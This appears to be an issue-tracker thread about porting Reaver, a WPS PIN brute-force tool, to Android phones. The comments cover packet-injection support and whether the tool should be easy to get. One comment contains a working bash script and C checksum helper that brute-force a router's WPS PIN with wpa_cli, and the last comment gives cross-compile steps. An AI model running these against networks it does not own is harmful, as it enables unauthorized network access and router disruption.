Comments (47)
Can you get packet injection working on your android phone?
I guess that might/will be the biggest problem.
Unless you can inject packets I don't see it happening
Original comment by [email protected]
on 31 Dec 2011 at 2:29
from reaver-wps.
Some time ago I got monitor mode and packet injection working on the G1 (wifi
chipset wl1251) thanks to N900 patches, so at least on G1 / Hero / Magic (all
have the wl1251) it should be possible.
http://forum.xda-developers.com/showthread.php?t=1271854
Original comment by [email protected]
on 31 Dec 2011 at 4:53
from reaver-wps.
[deleted comment]
from reaver-wps.
Supply me an android phone that will do monitor+inject and I will make it
happen.
-peter
Original comment by [email protected]
on 1 Jan 2012 at 1:39
- Added labels: Priority-Low, Type-Enhancement
- Removed labels: Priority-Medium, Type-Defect
from reaver-wps.
[deleted comment]
from reaver-wps.
If an A855 Motorola Droid can do monitor+inject, I can produce a working
handset.
Original comment by [email protected]
on 3 Jan 2012 at 12:48
from reaver-wps.
Most Motorola phones use TI chipsets which are not capable.
Original comment by [email protected]
on 3 Jan 2012 at 2:58
from reaver-wps.
If I provide a micro Linux embedded device that runs an OpenWrt distro, might
it be possible to release a port?
Original comment by [email protected]
on 4 Jan 2012 at 1:22
from reaver-wps.
Original comment by [email protected]
on 11 Jan 2012 at 4:54
- Changed state: NeedMoreInfo
from reaver-wps.
Some devices support USB-OTG, which would enable a kernel module, like rtl8187,
for use with a USB wireless adapter.
Original comment by [email protected]
on 13 Jan 2012 at 7:04
from reaver-wps.
I think that this tool needs to stay on PC. Because today any kiddie with this
tool and an Android smartphone can then hack their neighbors' network and do all
kinds of trouble. And honestly we don't want an increase of kid hackers.
Original comment by [email protected]
on 5 Feb 2012 at 1:42
from reaver-wps.
not just that but this tool boots clients off their routers.. we don't need
this in the hands of idiots =] or a windows version
what's wrong with a netbook like the eee? < 1 sec a pin on a cisco router.. I
wish there was a paypal to donate- I'd send a few bucks.. some really good code
here and he's integrating it into aircrack.. I see the site is selling a idiot
box to do this but if you have 600 bucks to throw around- then you are probably
proficient in other areas of life.. so have at it- I'm worried about the 12
year old snufalufagus with his phone denying his neighbors wifi by pressing a
button
it's like giving airpwn and a yagi to a moron and expecting him not to use it
on starbucks
between this and pyrit, it's no wonder I run wired at home with a long pass to
my ap.. even the brand new att routers are still vulnerable to the same attacks
as the last set, 100% breakable with the default key using wpa2.. who's in
charge of security over there, a cow maybe
Original comment by [email protected]
on 5 Feb 2012 at 4:38
from reaver-wps.
Considering that there is little consistency regarding android hardware this is
not the most likely port to occur, if it does then no doubt people will have to
buy the appropriate model (and revision) of phone (and a few sets of spare
batteries)
I'm sensing childishness though regarding the seeming anger regarding script
kiddies, do you really think that the script kiddies don't have laptops &
netbooks? If you were particularly knowledgeable you wouldn't be shouting
about keeping the tool PC only.
With Beagleboards, shivaplugs, Raspberry Pi and modded Pogoplugs there are a
multitude of low power consumption devices with USB (to use a network adaptor
of choice) to cause problems with (high powered antenna are not necessary with
such a setup) so don't be getting so precious folks, calm down
BTW there is real Wifi kit out there (I work with it) that live in retail
chains (and corporate land) strangely enough they do not use WPS, yes they have
been checked since christmas (to make sure they don't respond anyway), they are
much more interesting to play with than the average SoHo equipment
Original comment by [email protected]
on 6 Feb 2012 at 12:34
from reaver-wps.
[deleted comment]
from reaver-wps.
laptops and netbooks with windows running vmware and bt? yeah that's exactly
what they run.. but they've been limited to open and wep networks usually..
wpa2 solved with crunch piped to pyrit | cowpatty at 100k+/sec or dictionary
attack without a pre generated rainbow table is still out of skill set of the
snuffaluffagus.. they know nothing about these specific attacks or specialized
attacks on different types of routers, nothing because it takes more than
./configure make && make install..
reaver is so easy and automated, if it were to be ported to say ios for example
(jailbroke)- not just android (and it worked even with specific mass produced
phones), there would be jackass bowel movements all over the world.. I don't
care if a responsible geek manages to do this.. just the code he has written
here is almost too slick if you know what I'm sayin- he could have thrown in
some monkey wrenches =p I'm just sayin.. felt the same way about armitage..
anyways it's just my opinion on the matter.. what's sad is I noticed business
around here still running wep (even the bmw dealership's office runs wep here)
and at&t up to last year was still installing their 2wire routers with wep as
default
now they've switched to wpa2 but still have the same problem with the default
passkey, 10 characters numeric- that's 30 hours in pyrit for all the keys.. if
the wps pin attack didn't act like a dos on the router, I might not care- just
in the wrong hands this is a double butt violater
Original comment by [email protected]
on 6 Feb 2012 at 9:14
from reaver-wps.
I have to admit that for me an android version of reaver would be useful as the
people who hold the purse strings would get upset at a phone being used to
break their network security. For some reason 'management' still think that 'IT
professionals' are the only people on earth who have laptops (whatever an IT
professional is)
Anyway this will now be heading off topic
The biggest script kiddies I have ever encountered are so called professional
pen testers, they have their bought copy of Nessus on windows and a VM with
Backtrack then they simply follow their course notes, usually without much
understanding of the 'security issues' which they encounter.
However it has to be remembered that tomorrow's talented 'security researchers'
are today's beginners and very few beginners start with original methods.
Without reaver (or the other python script) would you be playing with WPS
breaking ?
I can answer an honest NO (for myself), though 15-20 years ago the answer would
have been Yes, as my life permitted me time to write interesting things.
If your answer is 'no' then please don't complain about idiots who have the
same tools as you, it happens and they have as much right as you have.
I used to be really uptight about the undeserving cut & paste coders &
crackers, I'm older now.
re: There's poor security all over, though sometimes there are reasons (mostly
arrogance, ignorance and cost), but sometimes it's unavoidable, legacy kit is
common, but the risk may be mitigated with careful firewalling, IDS and sanity
checking
Be thankful the tool exists in a reliable version and encourage its spread to
other platforms, you may have need of it at some point
Original comment by [email protected]
on 7 Feb 2012 at 10:28
from reaver-wps.
Motorola Backflip here; it's the same shit as my laptop (Broadcom stuff). As
far as I tried, I could only enable monitor mode (buggy) and packet injection is
impossible. I'm pretty sure it can be done on another phone using a different
WLAN chipset.
Original comment by [email protected]
on 25 Feb 2012 at 3:34
from reaver-wps.
Just wait for a recent kernel. Thanks to mac80211 nearly every recent driver in
the vanilla kernel supports packet injection and monitor mode. Android phones
mostly just have a very old kernel running.
Original comment by [email protected]
on 26 Feb 2012 at 4:17
from reaver-wps.
If tcpdump, wpa_cli and bash are available for android, which a quick bit of
recon tells me they are.
Then a workaround is more than likely possible. ;)
Original comment by [email protected]
on 28 Feb 2012 at 12:30
from reaver-wps.
For those who are alright with their programming, here's some basic building
blocks for a potential android wps tester. I'm just beginning programming, but
with a bit of help I rustled this up... this is the latest code I have working
thus far, on a regular system that is...
Pre-requisites that would need to be working already on android are...
Bash
Tcp-dump,
Wpa-cli/wpa_supplicant
Tee
Ean8 (separate module... I will include code as a suffix)
Here's the code I have working at the mo... The lines may get messed up, so I've
used me newly created #EL Tags to show where new lines are. Remove at own
discretion.
Name this file wpstester, or whatever you like ;), set its permissions, job's a
good un. This is fairly system specific so you might need to tweak it here and
there to get it working properly.
#!/bin/bash #EL
sudo tcpdump -i wlan0 -v -l 2> /dev/null | tee /home/$USER/log.txt & #EL
sleep 7 #EL
for i in {0..1}; do #EL
code=$(printf "%04d"000 $i) #EL
ans=$(ean8 $code) #EL
echo "Time : $(date +%H:%M:%S)" >> /home/$USER/log1.txt #EL
echo "BSSID : BSSID HERE" >> /home/$USER/log1.txt #EL
echo "WPS PIN : $ans" #EL
echo "WPS PIN : $ans" >> /home/$USER/log1.txt #EL
wpa_cli wps_reg BSSID HERE $ans >> /dev/null #EL
sleep 15 #EL
done #EL
for i in {2..2000}; do #EL
code=$(printf "%04d"000 $i) #EL
ans=$(ean8 $code) #EL
echo "Time : $(date +%H:%M:%S)" >> /home/$USER/log1.txt #EL
echo "BSSID : BSSID HERE" >> /home/$USER/log1.txt #EL
echo "WPS PIN : $ans" #EL
echo "WPS PIN : $ans" >> /home/$USER/log1.txt #EL
wpa_cli wps_reg BSSID HERE $ans >> /dev/null #EL
sleep 10 #EL
done #EL
sudo kill -9 2> /dev/null $(ps -A | grep tcpdump | awk '{print$1}') #EL
exit 0 #EL
And the Ean8 Module.....
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// to install 'make ean8' or 'gcc -o ean8 ean8.c'
// then move exe to /bin path.
int main(int argc, char *argv[]) {
    int i, odd_sum = 0, even_sum = 0, sum, check_digit;
    char *base;

    if (argc != 2) {
        fprintf(stderr, "Error: Wrong number of arguments\n");
        exit(EXIT_FAILURE);
    }
    base = argv[1];
    if (strlen(base) != 7) {
        fprintf(stderr, "Error: Argument is not 7 characters\n");
        exit(EXIT_FAILURE);
    }
    for (i = 0; i < 7; i += 2) {
        // Odd digits
        odd_sum += base[i] - '0';
    }
    for (i = 1; i < 7; i += 2) {
        // Even digits
        even_sum += base[i] - '0';
    }
    // Weighted sum: odd positions count three times
    sum = odd_sum * 3 + even_sum;
    check_digit = (10 - (sum % 10)) % 10;
    printf("%s%d\n", base, check_digit);
    return(EXIT_SUCCESS);
}
There's some other little tweaks you may have to do as well, to a couple of the
other programs, I've posted what I did with those on the hints and tips part of
this forum.
Maybe this will help someone along the line come up with a workaround for
android... who knows... If a reaver port isn't forthcoming.
Only downside is this workaround is a bit slower than reaver, until I figure
out how to implement small dh keys by tweaking the code in more than likely
wpa_supplicant/wpa_cli.
Good luck dudes/dudettes ;)
Original comment by [email protected]
on 6 Apr 2012 at 3:29
from reaver-wps.
P.S. the third sleep command can be set as a variable to whatever you find the
minimum try time is before you fry/crash the router you are testing.
There is a trend I noticed whereby the first 1-2 tries take slightly longer
than the average send time, and if you put a longer sleep time for the first
1-2 attempts, then the following attempts can actually be sped up
significantly. Granted this isn't as fast as reaver's small dh-keys, but for a
work-around I guess it's o.k ;)
Original comment by [email protected]
on 6 Apr 2012 at 3:36
from reaver-wps.
Sorry triple post....Then you just have to grep the log files for 'id 4'. (Off
the top of my head, might be 'id 3' though =P) That result cross-correlates
with the time in the other log-file and there you have the first 4 digits of
the wps pin.
Original comment by [email protected]
on 6 Apr 2012 at 3:40
from reaver-wps.
Haha sorry last thing.
In the original post on the hints and tips part i mentioned using wireshark.
You can use this method if you want, but the newer post above, creates a
semi-automatic solution, (i.e its better). By using the generically available
tcpdump instead, and integrating it as a co-process in the source-code.
Perhaps someone else can then take this and fully-automate it, the next step
was to integrate a sectional grepping procedure...i.e test 1..100 pins then
stop grep...check for 'id 3 (or 4)'continue...
I suppose i can continue my quest though, its actually a fascinating project
for learning a little programming =P.
Original comment by [email protected]
on 6 Apr 2012 at 4:00
from reaver-wps.
Any progress with reaver working with android?
Original comment by [email protected]
on 15 May 2012 at 9:11
from reaver-wps.
Yes. Put backtrack 5 on android!
Original comment by [email protected]
on 18 Jun 2012 at 3:53
from reaver-wps.
N900 and N950 has reaver.
Original comment by [email protected]
on 11 Aug 2012 at 9:40
from reaver-wps.
[deleted comment]
from reaver-wps.
[deleted comment]
from reaver-wps.
Monitor mode in android un possible. http://bcmon.blogspot.fi/. Now all we
need is reaver :)
Original comment by [email protected]
on 23 Sep 2012 at 1:56
from reaver-wps.
OMG, so much thanks for that link !!!!1 ;DDDD
Original comment by [email protected]
on 23 Sep 2012 at 3:12
from reaver-wps.
Anyway Reaver needs root, that's why it wouldn't be program for children :-)
Original comment by NosovK
on 29 Sep 2012 at 11:16
from reaver-wps.
Is there any way to boot it in Symbian OS?
Original comment by [email protected]
on 29 Jan 2013 at 12:20
from reaver-wps.
Any updates? I'd love to get reaver on my phone.
Original comment by [email protected]
on 2 Mar 2013 at 11:18
from reaver-wps.
hey there android supports now rtl 8187 chipset in monitor mode via USB-OTG no
root required
http://www.kismetwireless.net/android-pcap/
might be that injection would work too... so anyone out there ready to make
reaver-android port??
Original comment by [email protected]
on 4 Mar 2013 at 10:56
from reaver-wps.
HD2 with Android and Backtrack installed.
I have compiled and installed the bcm4329 driver with monitor mode, which works
correctly with airmon and aireplay.
Also, I have compiled and installed Reaver, but there is a support problem.
Reaver will not associate (a timeout occurs).
After aireplay fakeauth Reaver associates but starts getting
WARNING: Receive timeout occurred
Recorded PCAP file with both the Reaver association attempt and the association
after aireplay:
https://www.dropbox.com/s/bjsq8q2hfuyv7tc/rr-02.cap
Original comment by [email protected]
on 23 Jun 2013 at 8:34
from reaver-wps.
Just checked from another computer that monitored the same AP activity. No
packet is actually sent from the HD2 via Reaver.
Only when I used aireplay was a packet really sent.
rr-02.cap shows a packet capture from the same device as Reaver.
The driver developer mentioned the following:
"Radiotap - we don't handle radiotap on packet injection. 'aireplay-ng' works
fine with it but tools like 'reaver' seem to require it."
Can you add support for packet injection without Radiotap? (Like in
aireplay)
Original comment by [email protected]
on 23 Jun 2013 at 11:28
from reaver-wps.
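The radiotap-versus-bare-802.11 distinction the driver developer describes is visible in a capture file's link type. As an added example (not part of the thread and not Reaver's or the driver's code), this C function reads a classic pcap buffer and reports the link type and the first frame's radiotap header length; the function name and both sample byte arrays are constructed for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define LINKTYPE_IEEE802_11       105 /* bare 802.11 frames */
#define LINKTYPE_IEEE802_11_RADIO 127 /* radiotap header, then 802.11 */

/* Read a 32-bit field in the capture file's byte order. */
static uint32_t rd32(const uint8_t *p, int big_endian)
{
    if (big_endian)
        return (uint32_t)p[0] << 24 | (uint32_t)p[1] << 16 | (uint32_t)p[2] << 8 | p[3];
    return (uint32_t)p[3] << 24 | (uint32_t)p[2] << 16 | (uint32_t)p[1] << 8 | p[0];
}

/* Returns the pcap link type, or -1 if the buffer is malformed.
 * For a radiotap capture, *rt_len receives the radiotap header length of
 * the first frame (0 if the file holds no frames). */
int pcap_first_frame(const uint8_t *buf, size_t n, unsigned *rt_len)
{
    uint32_t magic, link, incl;
    const uint8_t *rt;
    unsigned len;
    int be;
    *rt_len = 0;
    if (n < 24) return -1;                       /* global header is 24 bytes */
    magic = rd32(buf, 0);
    if (magic == 0xa1b2c3d4u || magic == 0xa1b23c4du) be = 0;
    else if (magic == 0xd4c3b2a1u || magic == 0x4d3cb2a1u) be = 1;
    else return -1;
    link = rd32(buf + 20, be) & 0xffffu;         /* low 16 bits: link type */
    if (link != LINKTYPE_IEEE802_11_RADIO || n < 40) return (int)link;
    incl = rd32(buf + 32, be);                   /* captured length of frame 1 */
    if (incl < 8 || n - 40 < incl) return -1;
    rt = buf + 40;
    len = rt[2] | (unsigned)rt[3] << 8;          /* radiotap is little-endian */
    if (rt[0] != 0 || len < 8 || len > incl) return -1;
    *rt_len = len;
    return (int)link;
}

/* Constructed sample: little-endian pcap, link type 127, one 18-byte frame
 * (8-byte radiotap header with no fields, then a 10-byte 802.11 ACK). */
static const uint8_t SAMPLE_RADIOTAP[] = {
    0xd4,0xc3,0xb2,0xa1, 0x02,0x00,0x04,0x00, 0,0,0,0, 0,0,0,0,
    0xff,0xff,0x00,0x00, 0x7f,0x00,0x00,0x00,
    0,0,0,0, 0,0,0,0, 0x12,0,0,0, 0x12,0,0,0,
    0x00,0x00,0x08,0x00, 0x00,0x00,0x00,0x00,
    0xd4,0x00,0x00,0x00, 0x02,0x00,0x00,0x00,0x00,0x01
};
/* Constructed sample: header only, link type 105 (no radiotap). */
static const uint8_t SAMPLE_BARE[] = {
    0xd4,0xc3,0xb2,0xa1, 0x02,0x00,0x04,0x00, 0,0,0,0, 0,0,0,0,
    0xff,0xff,0x00,0x00, 0x69,0x00,0x00,0x00
};

int main(void)
{
    unsigned a, b;
    int x = pcap_first_frame(SAMPLE_RADIOTAP, sizeof SAMPLE_RADIOTAP, &a);
    int y = pcap_first_frame(SAMPLE_BARE, sizeof SAMPLE_BARE, &b);
    printf("radiotap: linktype %d, header %u bytes; bare: linktype %d\n", x, a, y);
    return 0;
}
```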
People, new update on monitor mode on Android:
http://bcmon.blogspot.de/2013/07/monitor-mode-reloaded_14.html
As far as I know that was one of the big problems keeping Reaver from being
ported to Android.
#35
How did you compile and install Reaver on Android? I'm on a Nexus 7 with
CyanogenMod 10.1.2. Thanks in advance.
Original comment by [email protected]
on 23 Jul 2013 at 11:29
from reaver-wps.
Done.
http://forum.xda-developers.com/showthread.php?t=2456888
Original comment by [email protected]
on 24 Sep 2013 at 7:49
from reaver-wps.
BCMON.apk does not work correctly with HD2 (ICS myMIUI ROM).
ping_bcmon does not return packets.
I have tested the supplied reaver with older (2012) bcmon kernel module drivers;
reaver starts fine but will not inject packets. Function pcap_inject is
processed without exception but the packet does not leave the interface.
Original comment by [email protected]
on 26 Sep 2013 at 8:40
from reaver-wps.
I feel like no one read anything that was being written on this blog
previously. Did no one notice that it's a good thing to not have tons of people
have this on their iPhones? Keep it to yourself. Don't post android ROMs with
reaver already installed online. Just do it by yourself. Do not jeopardize
Internet security for temporary happiness. That's terrorism. I feel like there
are only a few software engineers who would like to be terrorists.
Original comment by [email protected]
on 27 Oct 2013 at 12:10
from reaver-wps.
Ok calm down francis
Original comment by [email protected]
on 27 Oct 2013 at 12:26
from reaver-wps.
Jeopardizing Internet security? Sheesh.
If Reaver works on it, it was already insecure long before it became easy...
Original comment by [email protected]
on 27 Oct 2013 at 3:43
from reaver-wps.
Hello everyone, can anyone help to install reaver? It gives me an error,
pleaseeeeeeeeee:
./configure
checking for gcc... gcc
checking whether the C compiler works... no
configure: error: in `/root/reaver-1.4/src':
configure: error: C compiler cannot create executables
See `config.log' for more details.
Original comment by [email protected]
on 30 Oct 2014 at 11:30
from reaver-wps.
I installed bcmon and reaver for android, but when I opened RfA and tested the
monitor mode it showed me an error that monitor mode activation failed. What to
do now?
Original comment by [email protected]
on 12 Feb 2015 at 4:40
from reaver-wps.
[deleted comment]
from reaver-wps.
[deleted comment]
from reaver-wps.
Porting reaver-wps for android ARM platform
Steps:
1 - install crosscompiler ARM GNUEABI (sudo apt-get install gcc-4.7-arm-linux-gnueabi g++-4.7-arm-linux-gnueabi)
2 - Download http://www.infradead.org/~tgr/libnl/files/libnl-3.2.25.tar.gz
3 - Download http://www.tcpdump.org/release/libpcap-1.7.4.tar.gz
4 - Download Reaver-WPS source
5 - extract libnl-3.2.25.tar.gz and libpcap-1.7.4.tar.gz
6 - execute configure script to build Makefile for LIBNL3 (./configure --prefix=/system --host=arm-linux-gnueabi LDFLAGS='-static -L/system/lib' && make && sudo make install)
7 - execute configure script to build Makefile for LIBPCAP (./configure --prefix=/system --host=arm-linux-gnueabi --with-pcap=linux CFLAGS='-I/system/include/libnl3' LDFLAGS='-static -L/system/lib' && make && sudo make install)
8 - download https://www.sqlite.org/2015/sqlite-autoconf-3081101.tar.gz SQLITE3 (./configure --prefix=/system --host=arm-linux-gnueabi CFLAGS='-L/system/include' LDFLAGS='-static -L/system/lib' && make && sudo make install)
9 - Configuring for compiler ARM Reaver-WPS: ./configure --prefix=/system --sysconf=/etc && make V=1 CC=arm-linux-gnueabi-gcc CFLAGS='-pthread -s -static'
10 - copy the statically compiled wash and reaver files to /system/xbin on a rooted device (my rooted CM12 device is XT1069 using Dongle USB OTG TL-WR721N TP-LINK firmware kernel ath9k_htc modules ARM)
compiled binary files static
https://mega.co.nz/#!ZcN0EZoZ!DSSGCI4VV1O9eNd-fzmcr0Hu-t5XWxHfU9RJcaSn8D4
https://mega.co.nz/#!wd1EFZia!bROKZ4TFKx24w7niTMcZCU1YGw3D-QpwWUl5AZhW4uY
Reaver-WPS GUI APK
http://forum.xda-developers.com/showthread.php?t=2456888
have Fun :)
Original comment by [email protected]
on 1 Aug 2015 at 3:26
from reaver-wps.